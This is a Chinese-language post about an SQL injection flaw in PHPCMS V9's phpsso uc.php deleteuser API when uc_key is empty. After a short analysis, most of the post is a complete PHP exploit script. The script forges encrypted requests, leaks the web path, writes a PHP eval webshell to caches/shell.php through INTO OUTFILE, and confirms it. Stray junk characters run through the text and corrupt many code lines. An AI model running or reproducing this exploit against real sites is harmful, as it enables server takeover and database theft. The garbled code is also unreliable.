PHPCMS V9 uc API SQL注入漏洞

admin

PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
- `6 R# K1 J3 N8 [) f$ x' W5 Q
* Q. L7 S4 W( s4 p所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。

漏洞分析：
1.未启用ucenter服务的情况下uc_key为空
define('UC_KEY', pc_base::load_config('system', 'uc_key'));
4 t8 d* ^8 V6 c! j2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
, T/ o0 d" L' ~* C/ z    public function deleteuser($get,$post) {
        pc_base::load_app_func('global', 'admin');
        pc_base::load_app_class('messagequeue', 'admin' , 0);
( R6 K- ^# p) [, x  |) T- f  {        $ids = new_stripslashes($get['ids']);
8 u, ~# x3 u) ^! ?3 a        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
2 v) t% m5 M, e: n" \8 ?SQL语句为
SELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)
0 @( v7 i& f% Q) D) B
8 ]3 T- V8 ]7 C1 G8 u; u+ o, T利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
<?php
+ G8 i2 m. P4 B- Bprint_r('
---------------------------------------------------------------------------
PHPcms (v9 or Old Version) uc api sql injection 0day
by rayh4c#80sec.com
---------------------------------------------------------------------------
5 o  c; o: t5 t% b1 `- q');
0 E5 C) W5 ~5 Z; A, c8 c/ I
if ($argc<3) {
  c& j. h, [# f2 o1 e+ ]5 A& H    print_r('
" v0 O& d1 ^' P2 c7 M2 w5 W& \: a---------------------------------------------------------------------------
9 I! U( T) x% A( u2 d9 xUsage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
$ w0 F0 Z1 h) n' _' Z2 I8 U) i# \path:      path to phpcms
Options:
4 K; x0 H1 O  m -p[port]:    specify a port other than 80
; T4 d$ V9 M8 A2 }8 S -P[ip:port]: specify a proxy
: G! f0 n, D% @8 v7 g/ IExample:
php '.$argv[0].' localhost /
php '.$argv[0].' localhost /phpcms/ -p81
php '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
% d; X7 c7 C; U" D- M! e---------------------------------------------------------------------------
');
0 }9 j3 U# [( b    die;
7 X6 J: i( I# Z9 {}

, I$ I- s1 V: a  ~error_reporting(7);
9 c( Y2 M! A$ s5 R2 H& x0 Lini_set("max_execution_time",0);
' E  P: P! d2 b% s$ ]) M. mini_set("default_socket_timeout",5);
# R4 S3 K6 R% g; k, Y% S  O' [( k
8 d6 ?( y: B( c& v0 b6 Ufunction quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
2 P- W) a' B. e, W: @4 L   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
" ?' g+ y, i! r2 s, {; W/ L# ?$ ~. U   else
   {$result.="  ".$string[$i];}
& @# p& M8 j3 A' E; u   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
* A! T* e( q- W3 W+ l   else
% f' H8 ?+ E4 n) F/ b' Y& e* e   {$exa.=" 0".dechex(ord($string[$i]));}
/ u* Q. |5 I, d! [0 w; V+ ~$ C   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
return $exa."\r\n".$result;
+ Y+ C2 l; X1 ~' a  H' a* u}
% F. a: ]3 A0 w6 r$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
! B5 c" f" {. o- h9 X
# \- \/ E& d3 I% A2 ^function send($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
9 z9 o. y4 {2 d0 J  A    }
! w: C6 a/ \0 f, ?8 \/ [8 c1 H) y  }
  else {
        $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
: Q1 U: s! k! Y  G4 l    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
, }# I# f' `( \1 R! x    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
* W3 N5 ~6 U( O2 ?' @  o      echo 'No response from proxy...';die;
+ M5 S3 b5 M0 ^7 ^$ j  I/ R' S        }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
2 b: c5 Y: w  K3 _6 o7 [7 Z    $html='';
$ }& @! e2 D. `( R! W9 _    while (!feof($ock)) {
3 y7 q9 d5 @/ I4 M* T/ y      $html.=fgets($ock);
( J; u# k2 x- g6 q6 [    }
* Q! G* z7 g2 O1 O4 b2 j) H  }
; c' S6 [* s4 L' N( o( q  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
% l0 r/ f5 x. m# @3 a    }
  }
  fclose($ock);
}
1 W3 Z6 F# G- k. N7 `* E
& {- c! a- P) M8 x& j$host=$argv[1];
& P: {8 r; U3 W7 Y' ^0 [9 }$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
7 f6 t) u: @/ Y" K  N$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
/ f0 W! L, D# R  `0 Y( I{
  $port=(int)str_replace("-p","",$argv[$i]);
}
/ P; q% y1 ?7 X- q" K4 m" `" R0 R* vif ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
* ?! @' P& l+ S7 o8 U
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
: o# e* T7 w% f, Z' }  H! Cif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
/ V. y, m, j2 Z$ E9 T! M
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

5 i$ T& W/ g  ~2 H    $ckey_length = 4;

    $key = md5($key ? $key : '');
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
& w. Q' W9 v7 p- P/ j0 P    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
9 O. l& E; U. e& U7 d
( F- i0 Z1 M7 [* [    $cryptkey = $keya.md5($keya.$keyc);
: `: F' `: l0 ~    $key_length = strlen($cryptkey);

- n8 q% N( H7 Q  O1 a& o8 a    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
' X) R8 p" D9 q3 }+ L4 ^    $string_length = strlen($string);
: a; o  p0 M% X& [
) J. o5 w6 w% g9 Q$ b    $result = '';
9 {" M  c5 b3 b' [8 T    $box = range(0, 255);
0 |# g4 J- X4 O. z1 e. j0 s
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
& e3 ~! B2 d) o0 A6 J3 Q: Z. U        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
8 r. o- t: G/ h0 ]    }

    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
5 Y6 q/ p; p; y        $box[$i] = $box[$j];
- H- ~# m; f' R4 q5 G5 N        $box[$j] = $tmp;
    }
" ]5 d: D8 z. b% W
6 N: t: R& r( W3 [% B* V: [, O, O    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
3 H8 i" ^* G- R  R" g. M        $box[$a] = $box[$j];
! G- k* `: r% O0 [: C" l5 k        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
* ~% @+ ^! L3 C4 f/ Y2 r0 m3 k8 I+ W
5 a5 i" \. N" L    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
) d) \6 s5 ^* a* U$ L9 [            return substr($result, 26);
        } else {
            return '';
' e* `. z; C) k9 t- a; ?' @        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }

+ X" v. N& q+ t1 z}

$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
! T% h8 O& k" N! C2 W' c0 D6 Q! [$packet.="User-Agent: Mozilla/5.0\r\n";
# c+ q% G/ l. Y( E7 r& U2 V$packet.="Host: ".$host."\r\n";
1 C$ `5 }; {* Y; Q$packet.="Connection: Close\r\n\r\n";
" R, `" K1 c. {+ rsend($packet);
+ m# V/ }  W: v7 y0 C1 pif(strpos($html,"MySQL Errno") > 0){
- {( N4 Q- a  l$ L* Fecho "[2] 发现存在SQL注入漏洞"."\n";
- G& |) x- s+ v  Zecho "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
+ P5 p6 }' y8 M9 P/ B1 d. h2 d$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
+ \$ R8 p# f6 v0 V* i$packet.="User-Agent: Mozilla/5.0\r\n";
, |0 H8 h5 M% A  q* `8 F, X$packet.="Host: ".$host."\r\n";
; ~3 J% Z3 d3 v0 D# q$packet.="Connection: Close\r\n\r\n";
8 D: @9 |) W$ ^+ v/ M8 d( Ysend($packet);
preg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
//print_r($matches);
if(!empty($matches)){
8 T! h/ d- Y3 b/ `# N7 r, o  V, mecho "[4] 得到web路径 " . $matches[0]."\n";
( ], h' n6 [1 F: uecho "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
% |% r3 v9 B  F( z- F* D* B. _* b$SQL = "time=999999999999999999999999&ids=1)";
$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
$SQL.="&action=deleteuser";
& _& B& r7 X4 F+ v$SQL = urlencode(authcode($SQL, "ENCODE", ""));
9 E) E* g/ m' @8 Decho "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
" J4 O/ w0 H4 }- u7 X$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
+ _! E6 D0 X: c. N' G) l4 B' t$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
) o1 E/ K% Z6 s' ]' Q3 u$packet.="Connection: Close\r\n\r\n";
& f& T; W$ [( C. H- u# Ksend($packet);
) X  F/ ]) |7 \. h" J. |# yif(strpos($html,"Access denied") > 0){
echo "[-] MYSQL权限过低 禁止写入文件 ";
die;
  A% F# v1 J$ T}
echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
if(strpos($html,"<title>phpinfo()</title>") > 0){
echo "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
7 Z7 P5 n+ k0 F4 Z9 L  r& ~}
}else{
echo "[-]未取到web路径 ";
1 j5 r3 U4 y* q, t& K# @: v  _}
& d: p/ N8 T, h1 c7 J- K1 l9 |* Y1 _}else{
% K8 K( {* ]. [: \+ w5 Wecho "[*]不存在SQL注入漏洞"."\n";
}
* ?3 O2 [3 W" l9 x9 q
?>